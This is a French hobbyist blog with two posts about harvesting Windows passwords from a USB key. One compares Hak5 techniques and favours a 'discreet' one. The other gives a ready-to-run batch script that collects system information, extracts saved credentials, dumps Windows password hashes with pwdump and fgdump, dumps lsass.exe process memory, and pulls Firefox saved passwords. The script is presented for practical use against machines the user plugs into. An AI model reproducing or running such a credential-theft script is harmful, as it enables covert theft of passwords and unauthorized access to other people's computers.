articles
réactions
Jeff - 16.02.2008 | 0 réactions | #link | rss
Alors voilà, comme c'est un sujet récurrent et à priori intéressant pour beaucoup de personnes (sans parler de leurs motivations), j'ai continué mes bidouilles après cet article.

On m'a judicieusement rappelé ce lien, que je n'étais pas allé voir depuis longtemps. Il s'agit des projets de Hak5, en l'occurrence les clés USB destinées à récupérer les mots de passe Windows.



Le projet propose plusieurs solutions, notez que plusieurs liens ne sont plus actifs (au moment où j'y suis allé). Ensuite, j'ai écarté les solutions se basant sur les clés U3, je n'avais pas envie de flasher ou débugger les outils proposés. Notez là aussi que ces procédés sont totalement réalisables, même si quelques effets de bord existent (images corrompues ou mal mises à jour) et qu'il est nécessaire de bien tester le processus avant de vouloir l'utiliser en live.

Alors, parmi les solutions restantes, je citerai "Gandalf's technique" et la "DLSS's update (v2)".
  • La première copie des fichiers sur le disque dur, les décompresse et les exécute avant de copier les résultats sur la clé et de tout effacer. Je n'ai pas eu des résultats brillants, juste quelques infos générales quand le script ne plantait pas (le répertoire temporaire sur le disque peut être accédé directement avec %temp%, cela permet de suivre l'état d'avancement du processus).

  • La deuxième semble beaucoup plus prometteuse. D'une part elle est assez discrète et rapide, d'autre part je n'ai pas eu d'effet de bord (du genre "Lsass.exe a rencontré une erreur et votre PC va rebooter dans 60 secondes"). En clair, soit cela marche et l'on récupère les hashes et autres mots de passe enregistrés, soit cela ne marche pas mais aucune erreur n'est générée (à part dans le fichier de résultats). Le tout présenté sobrement et efficacement pour s'y retrouver facilement.


Dans les 2 cas, bien placer les fichiers à la racine de la clé, sinon les scripts s'emmêlent les pinceaux et aucun résultat n'est loggé.

A suivre...
Jeff - 22.12.2007 | 1 réactions | #link | rss
Après le premier article consacré aux traces laissées dans Windows, la logique voulait que je parle des outils qui permettent de récupérer ces informations, en particulier les mots de passe.

La plupart des outils cités dans ce billet sont utilisables en ligne de commande, ce qui permet donc de les exécuter avec un simple shell (Dos). L'exception concerne Cain, qui aux dernières nouvelles supporterait tellement de fonctionnalités qu'il en devient incontournable.



Une fois ces outils téléchargés, que faire me dira-t-on? Eh bien imaginez une clé USB, avec tous les softs dessus. Le script suivant permet de récolter pas mal d'infos:

## General infos gathering: "set" et "ver" affichent les caractéristiques du système, ipconfig celles du réseau et mountvol les lecteurs
ver > infos.txt
set >> infos.txt
ipconfig /ALL >> infos.txt
mountvol >> infos.txt

## Credentials extraction: ces outils affichent le contenu du protected storage, à savoir les mots de passe enregistrés
pstoreview.exe > log1.txt
creddump.exe > log2.txt

## Hashes dump (cache as well): ces outils tentent d'extraire les hashes Windows, correspondant aux mot de passe de login, même ceux en cache (voir l'article précédent)
pwdump.exe localhost > log3.txt
fgdump.exe -r -k

## Lsass dump: ici, on dump la mémoire d'un processus en cours d'execution - lsass.exe qui contient lui aussi les hashes. Cette procédure est appliquable à d'autres processus.
pmdump.exe -list > plist.txt
type plist.txt | findstr lsass > tmp.txt
FOR /f %%a in (tmp.txt) do set pid=%%a
pmdump.exe %pid% lsass.dump
DEL tmp.txt

## Additional: extrait les mots de passe de firefox. Voir l'article
dumpAutoComplete.exe > firefox.txt


A suivre.
FutureBlogs - v.0.8.6beta - Ce site est hébergé par http://monblog.ch